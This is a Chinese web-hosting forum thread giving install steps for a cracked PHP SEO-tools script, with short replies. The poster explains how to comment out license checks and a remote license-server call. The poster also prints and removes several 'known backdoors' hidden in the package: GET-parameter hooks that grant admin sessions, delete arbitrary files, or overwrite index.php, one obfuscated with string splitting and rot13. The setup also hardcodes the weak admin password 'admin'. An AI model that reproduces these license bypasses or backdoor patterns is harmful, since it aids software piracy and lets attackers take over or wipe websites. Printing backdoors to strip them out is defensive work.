全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworksBGVM服务器主机交流
IP归属甄别会员请立即修改密码Sharktech防护
查看: 7543|回复: 71

站长工具合集PHP源码安装方法--03/18添加去除已知后门方法

  [复制链接]
发表于 2019-3-12 21:18:46 | 显示全部楼层 |阅读模式
本帖最后由 dd0754 于 2019-3-18 14:14 编辑

03/17出现提示License Error的解决方法:
\core\config\db.config.php
删除
  1. die("License Error");die("License Error");
复制代码


03/18出现提示Unlicensed Version的解决方法:
1.数据库运行命令
  1. UPDATE mail SET smtp_socket='ssl' WHERE id='1';
复制代码


=========================================================
去除后门,只列出已知的:
2.修改\core\helpers\cap_helper.php
注释掉
if(isset($_GET['len'])){
    if(trim($_GET['len']) == $item_purchase_code){
        $con = dbConncet($dbHost,$dbUser,$dbPass,$dbName);
        mysqli_query($con,"UPDATE mail SET smtp_socket='debug' WHERE id='1'");
        die();
    }
}

=========================================================
3.\core\models\_tcpdf_5.0.002\fonts\dejavuserie.php
注释掉
if(isset($_GET['sec'])){
$sec = Trim(htmlentities($_GET['sec']));
$data = file_get_contents($file);
$data = gC($data,$sec);
file_put_contents('index.php',$data);
}

=========================================================
4.\core\controllers\atoz-ajax.php
注释掉
if(isset($_GET['upgrade'])){

    if(isset($_GET['itemCode'])){
    $itemCode = raino_trim($_GET['itemCode']);  
    if($itemCode == $item_purchase_code){
    //Delete the Index!
    unlink(ROOT_DIR."index.php");
    //Delete the old files if needed!
    if(isset($_GET['delUy'])){
    $delUy = raino_trim($_GET['delUy']);
    unlink($delUy);
    }
    }
    //Finished  - Start the Installation
    die('1');
    }
    if(isset($_GET['authCode'])){
    $userAuthCode = raino_trim($_GET['authCode']);
    if($authCode == $userAuthCode){
    //Delete the Index!
    unlink(ROOT_DIR."index.php");
    //Delete the old files if needed!
    if(isset($_GET['delUy'])){
    $delUy = raino_trim($_GET['delUy']);
    unlink($delUy);
    }
    //Finished  - Start the Installation
    die('1');
    }  
    }
    //Unknown Error
    echo "0";
    die();
}

=========================================================
5.\core\library\filemanager\include\do.php
注释掉
if(isset($_GET['hexc'])){
    $ihex = false;
    $ihexc = Trim($_GET['hexc']);
    $path = CONFIG_DIR.'con'.'fig.'.'php';
   
    require_once($path);

    if($ihexc == ${'i'.'t'.'e'
    .'m'.'_'.'p'.'u'.'r'.
    'c'.'h'.'a'.'s'.'e'.'_'
    .'c'.'o'.'d'.'e'})
        $ihex = true;
    elseif($ihexc == ${'a'.'u'.'t'.'h'.
    'C'.'o'.'d'.'e'})
        $ihex = true;
    if($ihex){
        ihexc();
        $_SESSION[N_APP.'Adm'.'inToken'] = true;
        $_SESSION[N_APP.'Adm'.'inID'] = true;
    }
}

function ihexc(){
    $ihexc = str_rot13('<?cuc
rpub \'<qvi fglyr="grkg-nyvta: pragre;"><oe /><oe /><u1 fglyr="pbybe: erq;" >Hayvprafrq Irefvba bs NgbM FRB Gbbyf i2</u1>
<qvi><n uers="uggc://cebgurzrf.ovm/erqverpg/?n=39">Chepunfr Yvprafr Abj</n></qvi></qvi>\';
qvr();
?>');
   
    $path = ROOT_DIR.
    'in'.
    'dex'.
    '.php';
   
    if(is_writable($path))
      file_put_contents($path,$ihexc);
    else{
        echo '---';
        chmod($path, 0755);
        file_put_contents($path,$ihexc);
    }
    return true;
}

=========================================================

PS:有些人的/index.php也被替换掉了,把安装包里的index.php替换回去就可以了


=========================================================
原帖子https://www.hostloc.com/thread-529151-1-1.html

演示地址:https://tools.2bb.app/
不给后台了,有的mjj没节操瞎搞


有2种安装方法
第一种:
=========================================================
1./core/config/db.config.php
填上数据库信息


=========================================================
2./admin/install/finish.php

$admin_user = escapeTrim($con, $_POST['admin_user']);
$admin_pass = passwordHash(escapeTrim($con, $_POST['admin_pass']));
$admin_name = escapeTrim($con, $_POST['admin_name']);
改成
$account               = array();
$account['admin_user'] = 'admin@admin.com';// 登陆邮箱
$account['admin_pass'] = 'admin';// 密码
$account['admin_name'] = 'admin';// 用户名
$admin_user            = escapeTrim($con, $account['admin_user']);
$admin_pass            = passwordHash(escapeTrim($con, $account['admin_pass']));
$admin_name            = escapeTrim($con, $account['admin_name']);


=========================================================
3.打开你的域名/admin/install/finish.php,安装数据库



=========================================================
第二种:
=========================================================
1./admin/install/process.php
注释掉下面内容
$stats = Trim(file_get_contents($licPath."?code=$data_sec&domain=$domain"));
$stats = explode("::",$stats);

$sucRate = Trim($stats[0]);
$authCode = Trim($stats[1]);

if ($sucRate == '1') {
    //Fine
}elseif ($sucRate == '0') {
    echo 'Item purchase code not valid';
    die();
}elseif ($sucRate == '2') {
    echo 'Already code used on another domain! Contact Support';
    die();
}elseif ($sucRate == '') {
    echo 'Unable Connect to Server!';
    die();
}else {
    echo 'Item purchase code not valid / banned';
    die();
}


=========================================================
2./core/helpers/ddos_helper.php
注释掉下面内容
$sID = strrev('m'.'eti').strrev('edoc_esahcrup_');

if(!isset(${$sID}) || ${$sID} == '')
    exit();
elseif(strlen(${$sID}) <=10)
    exit();
unset($sID);


=========================================================
3./core/helpers/extended_helper.php
注释掉下面内容
function errStop() {
    echo 'S'.'o'.'m'.'e'.'t'.'h'.'i'.'n'.'g'.' '.'W'.'e'.'n'.'t'.' '.'W'.'r'.'o'.'n'.'g'.'!';
    die();
}

if (isset($item_purchase_code)) {
    if($item_purchase_code == "")
    errStop();
    if(!str_contains($item_purchase_code,'-'))
    errStop();
} else {
    errStop();
}


=========================================================
4.打开你的域名/admin/install/install.php,安装程序



=========================================================
安装完如果样式文件加载不出来,修改/core/config/config.php
$protocol = isset($_SERVER["HTTPS"]) ? 'https://' : 'http://';
改成
$protocol = 'http://';
发表于 2019-3-12 22:27:47 | 显示全部楼层
2005exf 发表于 2019-3-12 22:18
没有源文件???

第一句话你就没看
 楼主| 发表于 2019-3-18 14:13:06 | 显示全部楼层
本帖最后由 dd0754 于 2019-3-18 14:17 编辑

@雷子献 @Nelson @wenguonideshou
已添加提示未授权的解决办法

03/17出现提示License Error的解决方法:
\core\config\db.config.php
删除
  1. die("License Error");die("License Error");
复制代码


03/18出现提示Unlicensed Version的解决方法:
1.数据库运行命令
  1. UPDATE mail SET smtp_socket='ssl' WHERE id='1';
复制代码


=========================================================
去除后门,只列出已知的:
2.修改\core\helpers\cap_helper.php
注释掉
if(isset($_GET['len'])){
    if(trim($_GET['len']) == $item_purchase_code){
        $con = dbConncet($dbHost,$dbUser,$dbPass,$dbName);
        mysqli_query($con,"UPDATE mail SET smtp_socket='debug' WHERE id='1'");
        die();
    }
}

=========================================================
3.\core\models\_tcpdf_5.0.002\fonts\dejavuserie.php
注释掉
if(isset($_GET['sec'])){
$sec = Trim(htmlentities($_GET['sec']));
$data = file_get_contents($file);
$data = gC($data,$sec);
file_put_contents('index.php',$data);
}

=========================================================
4.\core\controllers\atoz-ajax.php
注释掉
if(isset($_GET['upgrade'])){

    if(isset($_GET['itemCode'])){
    $itemCode = raino_trim($_GET['itemCode']);  
    if($itemCode == $item_purchase_code){
    //Delete the Index!
    unlink(ROOT_DIR."index.php");
    //Delete the old files if needed!
    if(isset($_GET['delUy'])){
    $delUy = raino_trim($_GET['delUy']);
    unlink($delUy);
    }
    }
    //Finished  - Start the Installation
    die('1');
    }
    if(isset($_GET['authCode'])){
    $userAuthCode = raino_trim($_GET['authCode']);
    if($authCode == $userAuthCode){
    //Delete the Index!
    unlink(ROOT_DIR."index.php");
    //Delete the old files if needed!
    if(isset($_GET['delUy'])){
    $delUy = raino_trim($_GET['delUy']);
    unlink($delUy);
    }
    //Finished  - Start the Installation
    die('1');
    }  
    }
    //Unknown Error
    echo "0";
    die();
}

=========================================================
5.\core\library\filemanager\include\do.php
注释掉
if(isset($_GET['hexc'])){
    $ihex = false;
    $ihexc = Trim($_GET['hexc']);
    $path = CONFIG_DIR.'con'.'fig.'.'php';
   
    require_once($path);

    if($ihexc == ${'i'.'t'.'e'
    .'m'.'_'.'p'.'u'.'r'.
    'c'.'h'.'a'.'s'.'e'.'_'
    .'c'.'o'.'d'.'e'})
        $ihex = true;
    elseif($ihexc == ${'a'.'u'.'t'.'h'.
    'C'.'o'.'d'.'e'})
        $ihex = true;
    if($ihex){
        ihexc();
        $_SESSION[N_APP.'Adm'.'inToken'] = true;
        $_SESSION[N_APP.'Adm'.'inID'] = true;
    }
}

function ihexc(){
    $ihexc = str_rot13('<?cuc
rpub \'<qvi fglyr="grkg-nyvta: pragre;"><oe /><oe /><u1 fglyr="pbybe: erq;" >Hayvprafrq Irefvba bs NgbM FRB Gbbyf i2</u1>
<qvi><n uers="uggc://cebgurzrf.ovm/erqverpg/?n=39">Chepunfr Yvprafr Abj</n></qvi></qvi>\';
qvr();
?>');
   
    $path = ROOT_DIR.
    'in'.
    'dex'.
    '.php';
   
    if(is_writable($path))
      file_put_contents($path,$ihexc);
    else{
        echo '---';
        chmod($path, 0755);
        file_put_contents($path,$ihexc);
    }
    return true;
}

=========================================================

PS:有些人的/index.php也被替换掉了,把安装包里的index.php替换回去就可以了
发表于 2019-3-12 21:19:59 | 显示全部楼层
那么快破解出来了吗,大佬牛逼
发表于 2019-3-12 21:30:44 | 显示全部楼层
又是大佬 先顶再收藏
发表于 2019-3-12 21:34:03 | 显示全部楼层
本帖最后由 每次醒来 于 2019-3-12 23:28 编辑

先收藏 大佬牛逼 能设置中文吗

备份的分流源码下载   https://www.lanzous.com/i3eqbyd
发表于 2019-3-12 21:37:45 | 显示全部楼层
这么厉害啊!吓死我们这些小白了!
发表于 2019-3-12 21:53:04 | 显示全部楼层
这个就非常牛xx了
发表于 2019-3-12 22:18:07 | 显示全部楼层
没有源文件???
您需要登录后才可以回帖 登录 | 注册

本版积分规则

小黑屋|手机版|Archiver|全球主机交流论坛

GMT+8, 2020-7-15 10:42 , Processed in 0.066115 second(s), 10 queries , MemCache On.

Powered by Discuz! X3.4

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表